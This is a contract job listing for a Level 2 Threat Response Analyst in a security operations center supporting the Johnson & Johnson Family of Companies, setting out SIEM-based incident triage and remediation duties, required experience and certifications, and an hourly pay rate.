Analyst 4 - Information Security

Johnson & Johnson Family of Companies

Title: Level 2 Threat Response Analyst

Location: Raritan, NJ

Duration: 1 month

Pay Rate: $80.72

Benefits on offer for this contract position: Health Insurance, Life insurance, 401K and Voluntary Benefits

Please note that this is a contract role providing services to the Johnson & Johnson Family of Companies through external staffing partners of Kelly OCG. If you are selected for this role, you will be employed by a contract staffing supplier and will not be a member of the Johnson & Johnson Family of Companies.

Summary:

We are focused, driven, and dedicated to providing world-class Security incident handling services. On the Cyber Security Operations Center level 1 (CSOC L1)/ level 2 (CSOC L2) team, we continually supervise possible malicious activity on endpoints, servers, networks, applications, databases, websites and other IT systems, looking for malicious activity that could be the indication of a security incident. We analyze security alerts, assess threat impact and coordinate containment, mitigation and eradication strategies by investing in our people.

Responsibilities:

• Responsible for advanced ticket analysis, foundational remediations, and identifying and implementing continuous improvement initiatives
• Performs secondary investigation of escalations from L1 Analysts providing additional context
• Utilizing SIEM tools and other security technologies, including monitoring of network traffic, log analysis, and identifying and triaging potential security incidents
• Actively remediates complex malware infections, persistence mechanisms, and compromised accounts via file quarantine, registry and startup file modifications, and forced password/session revocation within AD
• Thorough understanding of Cloud and Operational Technology (OT) environments and infrastructure and uses the tools and methods defined in the standard operation procedure (SOP) to validate indicators of compromise and contain/remediate the threat.
• Identifies potential gaps in security controls, proposes active mitigations, and implements blocks based on file hash, malicious domain, IP, command line, etc.
• Reviews ticket volume for alert tuning and refinement opportunities to drive continuous improvement and automation of detection and remediation
• Assists SOC manager with metrics gathering, review, and reporting
• Assists SOC manager in identifying sources of continuous improvement, creation and maintenance of process documentation, and leading training for CI initiatives
• Responsible for consuming cyber threat intelligence and pursuing continuous education in order to stay current on modern attack vectors and adversaries

Qualifications:

• A minimum of a bachelor’s degree or equivalent related experience is required.
• A minimum of 7 years of cyber investigation experience.
• Excellent executive intelligence writing and briefing skills.
• Deep understanding in using SIEM and related tools to conduct investigations.
• Knowledge of incident response processes is required.
• Strong IT experience with common operating systems, services, networking protocols, logging, attacker techniques and tools is required and the ability to articulate the relationship between the various data sources is required.
• Proven track record to identify operational deficiencies and drive corrective actions and plans to address them is required.
• A solid grasp of the current threat landscape including the latest tactics, tools, and procedures, common malware variants, and effective techniques for detecting this malicious activity is required.
• Superb interpersonal, verbal, and written communication skills are required.
• Possessing the credibility and presence to act as subject matter expert is required.
• Results Orientation/Sense of Urgency – ability to drive to short timelines required.
• Creative problem-solving skills required.
• This role may require up to 10% travel Preferred:
• Experience with Cloud Security technologies as Microsoft Azure Security Center, Log Analytics or Azure Sentinel is preferred
• Knowledge and experience with industrial networks would be a plus.
• Experience working with virtual, global teams – including diverse groups of people with multifaceted backgrounds and cultural experience is preferred
• Security certifications in Sec , Network , GCIH, CISSP, CISM, Certified Ethical Hacker, Cybersecurity Practitioner (CSX-P) preferred

Salary : $81